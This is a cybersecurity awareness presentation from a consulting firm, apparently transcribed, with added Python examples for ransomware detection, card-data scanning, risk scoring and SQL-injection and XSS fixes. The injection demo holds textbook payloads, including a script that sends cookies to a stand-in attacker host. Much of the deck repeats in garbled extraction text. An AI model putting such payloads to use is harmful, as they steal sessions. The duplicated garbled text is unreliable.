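from collections import defaultdict, deque

HIGH_ENTROPY = 7.5       # bits per byte; encrypted or compressed data sits near 8.0
WINDOW_SECONDS = 60
BURST_THRESHOLD = 20     # high-entropy rewrites by one process inside the window


def shannon_entropy(data):
    """Bits of entropy per byte: 0.0 for a constant run, 8.0 when every byte value is equally common."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def detect_bursts(events):
    """events: (timestamp, process, path, old_ext, new_ext, content) per file write.

    Flags a process once it performs BURST_THRESHOLD rewrites inside WINDOW_SECONDS
    that both change the file extension and leave high-entropy content behind.
    Returns {process: (first_timestamp_in_burst, writes_in_window)}.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, proc, path, old_ext, new_ext, content in sorted(events, key=lambda e: e[0]):
        if old_ext == new_ext or shannon_entropy(content) < HIGH_ENTROPY:
            continue                                   # ordinary save, not an encrypt-and-rename
        q = recent[proc]
        q.append(ts)
        while ts - q[0] > WINDOW_SECONDS:
            q.popleft()
        if len(q) >= BURST_THRESHOLD and proc not in alerts:
            alerts[proc] = (q[0], len(q))
    return alerts


# Constructed sample events (not real telemetry). A word processor saves normal documents;
# a rogue process rewrites 30 documents as .locked with ciphertext-like content in 30 seconds.
PLAINTEXT = b"Quarterly report: revenue grew and costs were flat. " * 80
CIPHERTEXT = bytes((i * 7919 + 13) % 256 for i in range(4096))   # each byte value appears 16 times


def build_sample_events():
    events = []
    for i in range(10):
        events.append((i * 300, "WINWORD.EXE", f"C:/docs/report{i}.docx", "docx", "docx", PLAINTEXT))
    for i in range(30):
        events.append((1000 + i, "updater_helper.exe", f"C:/docs/report{i}.docx", "docx", "locked", CIPHERTEXT))
    return events


if __name__ == "__main__":
    print("plaintext entropy  %.2f" % shannon_entropy(PLAINTEXT))
    print("ciphertext entropy %.2f" % shannon_entropy(CIPHERTEXT))
    print("alerts:", detect_bursts(build_sample_events()))
```

Real backup software and archivers also write high-entropy files, so the extension change and the per-process burst are what keep false positives down; a few canary documents that no user should ever touch are a cheap complement to this check.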
COMMON CYBER ATTACK PATTERNS
• 78% of all breaches result from these 5 attack patterns:
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
• 63% of all breaches are attributable to the top 2 alone
Common attack patterns account for the vast majority of documented breaches.
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can undo an organization's other security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting (XSS) and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
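To show why SQL injection and cross-site scripting top that list, here is an added example (not from the presentation) of a login query and a comment renderer written the vulnerable way and the fixed way. The user table is a constructed in-memory SQLite database, and the payloads are the textbook ones.

```python
import html
import sqlite3


def make_db():
    """In-memory table standing in for a web application's user store (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    # Plaintext passwords only to keep the injection visible; real applications store hashes.
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret!", "admin"), ("bob", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text, so the input can rewrite the query."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Parameterized query: the values travel separately and are never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def render_comment_vulnerable(comment):
    """Reflects user text straight into HTML, so a <script> tag runs in other visitors' browsers."""
    return f"<p>{comment}</p>"


def render_comment_safe(comment):
    """Escapes the HTML metacharacters, so the same text is displayed instead of executed."""
    return f"<p>{html.escape(comment)}</p>"


# Closes the quoted string after 'alice' and comments out the password check that follows.
SQLI_PAYLOAD = "alice' --"
# Ships every visitor's cookie to a constructed attacker host.
XSS_PAYLOAD = "<script>document.location='https://attacker.example/?c='+document.cookie</script>"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, SQLI_PAYLOAD, "wrong"))   # ('alice', 'admin')
    print("safe login:      ", login_safe(db, SQLI_PAYLOAD, "wrong"))         # None
    print(render_comment_vulnerable(XSS_PAYLOAD))
    print(render_comment_safe(XSS_PAYLOAD))
```

The vulnerable query becomes `SELECT ... WHERE username = 'alice' --' AND password = 'wrong'`, which the database reads as a lookup on the username alone, so the attacker logs in as the admin without a password. The fix is not input filtering but keeping data and query text apart (parameters for SQL, output encoding for HTML).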
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target the systems that capture customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a route into an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside executive management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting software vulnerabilities or backdoors (in browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware covers any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and backdoors are the most common forms of crimeware
• Crimeware is typically introduced through the following:
- Email attachment
- Malicious script or drive-by download from a visited website
- Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach (2013) – 70 million PII records of customers and 40 million credit cards stolen
• Sony Attack (2014) – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breaches (2013/2014) – An August 2013 breach exposed the PII of 1 billion users and a 2014 breach exposed 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bangladesh Bank (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third-party vendor (the HVAC vendor) through malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to the third-party website used for submitting electronic invoices
• Exploited a vulnerability in the electronic submission process to inject code and gain further access to Target's internal network
• Performed reconnaissance of the environment and obtained domain administrator access
• Attackers then worked their way through various servers, using a scanner to detect which other servers they could reach from their current location, working around firewalls and other defenses
COMPLEXITY BEHIND THE TARGET ATTACK (continued)
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (which should have been walled off from the rest of the network)
• Attackers then went on the darknet to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory (a "RAM scraper") and saved off credit card information while it was being processed in the clear
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves
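The RAM-scraping step is what turned the Target intrusion into a card breach: cardholder data passes through POS memory unencrypted. The added example below (not from the presentation, and not the attackers' tool) shows the pattern matching defenders run over a staging file or memory dump to confirm whether it contains track-2 records or card numbers: each digit run gets a Luhn check plus an issuer-prefix check, and only masked numbers are reported. The dump contents and host names are constructed; the card numbers are the standard published test numbers, not real accounts.

```python
import re

# Track 2 magstripe data as it sits in POS memory: ;PAN=YYMM<service code><discretionary>?
TRACK2_RE = re.compile(r";?(\d{13,19})=(\d{4})\d{0,20}\??")
PAN_RE = re.compile(r"(?<!\d)(\d{13,19})(?!\d)")
# Luhn alone passes about 1 in 10 random digit strings, so also require a plausible issuer
# prefix (Visa 4, Mastercard 51-55, Amex 34/37, Discover 6011); extend for other issuers.
ISSUER_PREFIX = re.compile(r"^(4|5[1-5]|3[47]|6011)")


def luhn_ok(digits):
    """Luhn check-digit validation, which every payment card number satisfies."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                       # double every second digit from the right
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def looks_like_pan(digits):
    return bool(ISSUER_PREFIX.match(digits)) and luhn_ok(digits)


def mask(pan):
    """Keep the first six and last four digits, the form allowed in logs and reports."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_card_data(blob):
    """Scan a byte blob (memory dump, staging file) for track-2 records and bare PANs.

    Returns a list of (kind, masked_pan); the full number is never kept.
    """
    text = blob.decode("latin-1")            # one character per byte, never fails
    found, seen = [], set()
    for m in TRACK2_RE.finditer(text):
        pan = m.group(1)
        if looks_like_pan(pan) and pan not in seen:
            seen.add(pan)
            found.append(("track2", mask(pan)))
    for m in PAN_RE.finditer(text):
        pan = m.group(1)
        if looks_like_pan(pan) and pan not in seen:
            seen.add(pan)
            found.append(("pan", mask(pan)))
    return found


# Constructed sample (not real data): a track-2 record and a bare PAN using published test
# numbers, a transaction timestamp that must not match, and a mistyped number that fails Luhn.
SAMPLE_DUMP = (
    b"POS01 2017-10-27 09:30:15 txn=20171027093015\n"
    b"\x00\x00;4111111111111111=25121010000?\x00\x00\n"
    b"cardholder PAN 5555555555554444 approved\n"
    b"typo 4111111111111112 declined\n"
)

if __name__ == "__main__":
    for kind, masked in find_card_data(SAMPLE_DUMP):
        print(kind, masked)
```

Finding track-2 data in a file on a POS server is close to conclusive: that format exists only between the card reader and the payment application, so a file holding it is a scraper's output. The same scan run over outbound FTP or HTTP payloads at the network edge is how the final exfiltration step in the Target chain could have been caught.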
RANSOMWARE – ANATOMY OF AN ATTACK (diagram slide; no text captured)
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. The main reasons companies struggle are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE | TECHNOLOGY | PROCESSES
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best-practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE threat modeling (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege) to semi-qualitatively measure cybersecurity risks, in order to identify, estimate and prioritize information security risks
Steps: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
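The five steps above can be tied together in a small risk register. The Python below is an added example written for this page, not Stinnett's tool or scoring method; the classification weights, the 1-to-5 likelihood and impact scales, the rating thresholds and the sample assets and threats are all assumptions.

```python
from dataclasses import dataclass

STRIDE = {
    "S": "Spoofing", "T": "Tampering", "R": "Repudiation",
    "I": "Information disclosure", "D": "Denial of service", "E": "Elevation of privilege",
}
# Assumed weights for the classification step; the presentation does not give Stinnett's scale.
CLASSIFICATION_WEIGHT = {"public": 1, "internal": 2, "confidential": 3, "restricted": 4}


@dataclass
class Asset:
    name: str
    location: str
    classification: str


@dataclass
class Threat:
    asset: str
    category: str                 # one STRIDE letter
    likelihood: int               # 1 (rare) .. 5 (expected)
    impact: int                   # 1 (negligible) .. 5 (severe)
    control_effectiveness: float  # 0.0 (no control in place) .. 1.0 (fully mitigated)


def risk_score(threat, asset):
    """Semi-qualitative score: likelihood x impact x classification weight, reduced by existing controls."""
    weight = CLASSIFICATION_WEIGHT[asset.classification]
    return round(threat.likelihood * threat.impact * weight * (1 - threat.control_effectiveness))


def rating(score):
    return "High" if score >= 40 else "Medium" if score >= 15 else "Low"


def build_register(assets, threats):
    """Return the threat register sorted so the highest calculated risk comes first."""
    by_name = {a.name: a for a in assets}
    rows = []
    for t in threats:
        a = by_name[t.asset]
        s = risk_score(t, a)
        rows.append({"asset": a.name, "location": a.location, "threat": STRIDE[t.category],
                     "score": s, "rating": rating(s)})
    return sorted(rows, key=lambda r: (-r["score"], r["asset"]))


# Constructed sample inventory (not a client's data).
SAMPLE_ASSETS = [
    Asset("Cardholder database", "data center", "restricted"),
    Asset("Marketing website", "cloud hosting", "public"),
]
SAMPLE_THREATS = [
    Threat("Cardholder database", "I", likelihood=3, impact=5, control_effectiveness=0.2),
    Threat("Cardholder database", "E", likelihood=2, impact=5, control_effectiveness=0.5),
    Threat("Marketing website", "T", likelihood=4, impact=3, control_effectiveness=0.3),
    Threat("Marketing website", "D", likelihood=5, impact=2, control_effectiveness=0.5),
]

if __name__ == "__main__":
    for row in build_register(SAMPLE_ASSETS, SAMPLE_THREATS):
        print(f'{row["rating"]:6} {row["score"]:3}  {row["asset"]} / {row["threat"]}')
```

Because the classification weight multiplies the score, a moderate threat to a restricted asset outranks a likely one to a public asset, which is the effect the "classification of assets" step is meant to have on the final prioritization.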
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
  • Credit card data
  • Employee or customer records
  • Bank accounts
  • Intellectual property
  • Trade secrets
  • Insider knowledge
• Who would want the data?
• Where is the data located?
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the devices on their network and therefore are unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, the failure of least privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated from the production network, so that ransomware cannot encrypt the backups along with the data
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates, 8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number 918.728.3300
ContactUs@Stinnett-Associates.com
PHISHING
A form of social engineering in which a message typically an email with a malicious
attachment or link is sent to a victim with the intent of tricking the recipient to open an
attachment
23
Spear-Phishing ndash Phishing attacks directed at a specific
individual or company Sub-category of Spear Phishing includes
Cloning (using a previous legitimate email) and Whaling (attacking
a high level executive)
bull CEO Email to Treasurer
bull HR Phishing for Employee Data
bull W2 Phishing Data (IRS Sent out Warning)
The majority of Phishing cases are used as a means to install
Malware onto a host environment
copyStinnett amp Associates LLC
PHISHING
Most companies battle the increase Phishing and spear-phishing attacks by labeling each
external email with some form of the following inserts
24
copyStinnett amp Associates LLC
MALWARE
Malware is short for malicious software Malware is a broad term that encompasses computer
viruses worms Trojan horses spyware adware and now Ransomware Malware is designed
to interfere with normal computer operation usually giving hackers a chance to gain access to
your computer and collect sensitive personal information
25
bull Malware is seen as first access
point used in connection with
hacking attempts
bull Ransomware is the latest version
of Malware that has been in the
headlines and represents one of
the largest cyber threats to most
companies
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
RANSOMWARE
A type of malware that prevents or limits users from accessing their system either by locking the
systems screen or by locking the users files unless a ransom is paid Ransomware typically
encrypts certain file types on infected systems and forces users to pay the ransom through certain
online payment methods to get a decrypt key
26
bull The Use of BITCOINS is typically the
payment method
bull Ransomware attacks quadrupled to 4000
per day from 2015 to 2016
bull This yearrsquos WannaCry Ransomware attack
impacted over 200000 people across 150
countries (included a Worm)
copyStinnett amp Associates LLC
COMMON CYBER ATTACK PATTERNS
bull 78 of all breaches results from these 5
Attack Patterns
- Web App Attacks
- POS Intrusions
- Privilege Misuse
- Cyber-espionage
- Crimeware
63 of all breaches attributable to the top 2 alone
27
Common attack patterns account for a vast majority of documented breaches
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
WEB APP ATTACKS
bull Modern websites with business
functionality increase the impact of a
successful breach
bull Recycled or unchanged default
passwords can compromise an
organizationrsquos security efforts
bull Breaching a web application can
open the gates to internal
applications and code
bull Cross site scripting and SQL
injection are most common attack
attempts
28
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
POINT-OF-SALE (POS) INTRUSIONS
bull Attackers target systems capturing
customer payment information during
legitimate transactions
bull Attacks can exploit POS software or
hardware
bull Attackers commonly target POS
system vendors as a means to exploit
an organizationrsquos POS system
bull Retail and accommodation sites are
experiencing massive POS attacks
29
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
PRIVILEGE MISUSE
bull Internal Parties act (maliciously or
not) in a way to cause a breach
bull Most actors are outside Executive
Management and leadership roles
bull While financial reasons still motivate
most actors espionage has become
an increasingly common motivation
bull Most breaches take months or
longer to discover
30
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end-user training program
• Ensure backups and recovery plans work as intended and are properly segregated
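As an added example (not Stinnett's code or tooling), the following Python script applies the fixes above as rules over a constructed device and account inventory: patches older than a year, internet-facing hosts running the software families named above, shared or over-privileged IDs, and password length and change interval. The hosts, IDs and the 12-character / 90-day password thresholds are assumptions, not values from the deck.

```python
"""Baseline gap check over a constructed device and account inventory.

Added example, not Stinnett's code. Rules follow the FIXES slide:
  devices  - flag missing patches older than a year, prioritise internet-facing hosts
             and the software families the slide names (Adobe, Java, browsers, OS)
  accounts - flag shared IDs, weak password parameters, and admin IDs needing justification
All hosts, IDs and policy thresholds below are constructed for illustration.
"""
from dataclasses import dataclass
from datetime import date
from typing import Optional

MAX_PATCH_AGE_DAYS = 365      # slide: 99% of exploited vulns had a patch out over a year
MIN_PASSWORD_LENGTH = 12      # assumed policy thresholds, not stated on the slide
MAX_PASSWORD_AGE_DAYS = 90
HIGH_RISK_SOFTWARE = {"adobe", "java", "browser", "operating system"}  # named on the slide

SEVERITY_ORDER = {"HIGH": 0, "MEDIUM": 1, "LOW": 2}


@dataclass
class Device:
    name: str
    software: str                         # software family of the oldest missing patch
    internet_facing: bool
    oldest_missing_patch: Optional[date]  # vendor release date of that patch; None if current


@dataclass
class Account:
    user_id: str
    owner: Optional[str]                  # accountable person; None means a shared ID
    is_admin: bool
    password_length: int
    password_age_days: int


def device_findings(devices, today):
    """Rate each device's patch exposure from patch age, exposure and software family."""
    out = []
    for d in devices:
        if d.oldest_missing_patch is None:
            continue                       # fully patched, nothing to report
        age = (today - d.oldest_missing_patch).days
        stale = age > MAX_PATCH_AGE_DAYS
        risky_sw = d.software.lower() in HIGH_RISK_SOFTWARE
        if stale and d.internet_facing:
            sev = "HIGH"
        elif stale or (d.internet_facing and risky_sw):
            sev = "MEDIUM"
        elif risky_sw:
            sev = "LOW"
        else:
            continue
        out.append((sev, d.name, f"{d.software} patch missing for {age} days"))
    return out


def account_findings(accounts):
    """Check each ID against least privilege and the password parameters on the slide."""
    out = []
    for a in accounts:
        bump = "HIGH" if a.is_admin else "MEDIUM"   # any weakness on an admin ID is HIGH
        if a.owner is None:
            out.append((bump, a.user_id, "shared ID with no accountable owner"))
        if a.password_length < MIN_PASSWORD_LENGTH:
            out.append((bump, a.user_id, f"password length {a.password_length} below minimum"))
        if a.password_age_days > MAX_PASSWORD_AGE_DAYS:
            out.append((bump, a.user_id, f"password unchanged for {a.password_age_days} days"))
        if a.is_admin:
            out.append(("LOW", a.user_id, "admin access: document why this level is necessary"))
    return out


def baseline_report(devices, accounts, today):
    """All findings, highest severity first, plus a count per severity."""
    findings = device_findings(devices, today) + account_findings(accounts)
    findings.sort(key=lambda f: (SEVERITY_ORDER[f[0]], f[1]))
    counts = {s: sum(1 for f in findings if f[0] == s) for s in SEVERITY_ORDER}
    return findings, counts


# Constructed sample inventory (hypothetical hosts and IDs).
TODAY = date(2017, 10, 27)
DEVICES = [
    Device("web-01", "Java", True, date(2016, 3, 1)),                 # stale + exposed -> HIGH
    Device("file-srv", "Operating System", False, date(2016, 1, 15)),  # stale, internal -> MEDIUM
    Device("kiosk-3", "Adobe", True, date(2017, 9, 1)),               # fresh but exposed -> MEDIUM
    Device("hr-pc-7", "Browser", False, date(2017, 10, 1)),           # fresh, internal -> LOW
    Device("db-02", "Operating System", False, None),                 # fully patched -> none
    Device("vpn-gw", "Java", True, date(2016, 10, 27)),               # exactly 365 days -> MEDIUM
]
ACCOUNTS = [
    Account("svc_backup", None, True, 8, 400),     # shared admin, short and stale password
    Account("jdoe", "Jane Doe", False, 14, 30),    # clean
    Account("admin2", "A. Smith", True, 16, 45),   # admin, only needs a justification
]

if __name__ == "__main__":
    findings, counts = baseline_report(DEVICES, ACCOUNTS, TODAY)
    for sev, subject, msg in findings:
        print(f"{sev:6} {subject:10} {msg}")
    print(counts)
```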
QUESTIONS
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates
8811 S Yale Ave, Suite 300
Tulsa, OK 74137
Main Number 918.728.3300
ContactUs@Stinnett-Associates.com
LEARNING OBJECTIVES
• Why should we be concerned with cybersecurity?
• What are some key cybersecurity definitions?
• What are some emerging cybersecurity trends and threats?
• What happened with some recent high-profile cybersecurity attacks?
• What are some cybersecurity roadblocks?
• What are steps to evaluate your company's cybersecurity risk level?
• How can you take preventive measures and protect yourself and your company?
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON?
…AND THESE?
…THEY ALL HAVE AT LEAST TWO THINGS IN COMMON
ALL HAVE BEEN VICTIMS OF CYBER ATTACK & BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
LIST OF RECENT HEADLINES
WHY DO WE CARE?
Security compromises are a persistent business risk.
• US Department of Commerce estimates intellectual property theft costs US companies $250 billion annually
• In 2015, 38% more security incidents were detected than in 2014
• 70% of cyber attacks and data breaches go undetected
• 69% of organizations learn of their breach from an outside entity such as law enforcement, customers or suppliers
• Data breaches cost companies an average of $154 per compromised record
• Cyberinsurance market will reach $7.5 billion in annual sales by 2020, up from $2.5 billion in 2016
• Cyber crime costs estimated to reach $2 trillion by 2019
• 20% of small and mid-size businesses have been cyber crime targets
Source: PwC Global State of Information Security Survey 2016; US Dept. of Commerce, Stolen Intellectual Property Harms American Businesses, Says Acting Deputy Secretary Blank, 2012; IBM and Ponemon, 2015 Cost of Data Breach Study: Global Analysis
FINANCIAL GAIN STILL #1 REASON
Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2015. Espionage and other factors combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers
• Ransomware payments estimated at over $1 billion in 2016
• 70% of all ransomware was paid
• 20% paid over $20,000
Source: Verizon Data Breach Investigations Report 2016
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII data
• Insider trading information
• Using a compromised environment for other attacks or for rent
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
• Server attacks, once at 50%, are trending down
• User Device and Person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
The types of exploits used are changing.
Source: Verizon Data Breach Investigations Report 2016
CYBERSECURITY DEFINED
The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access.
Cybersecurity is usually considered a sub-set of Information Security, but can require the consideration of:
• Application Security
• Operating System and Network Security
• Usage of specific intrusion detection and prevention software and tools
• User Training and Education
• Disaster Recovery and Business Continuity Considerations
• Really anything to help prevent, detect or recover from a cyberattack
CYBER ATTACK DEFINED
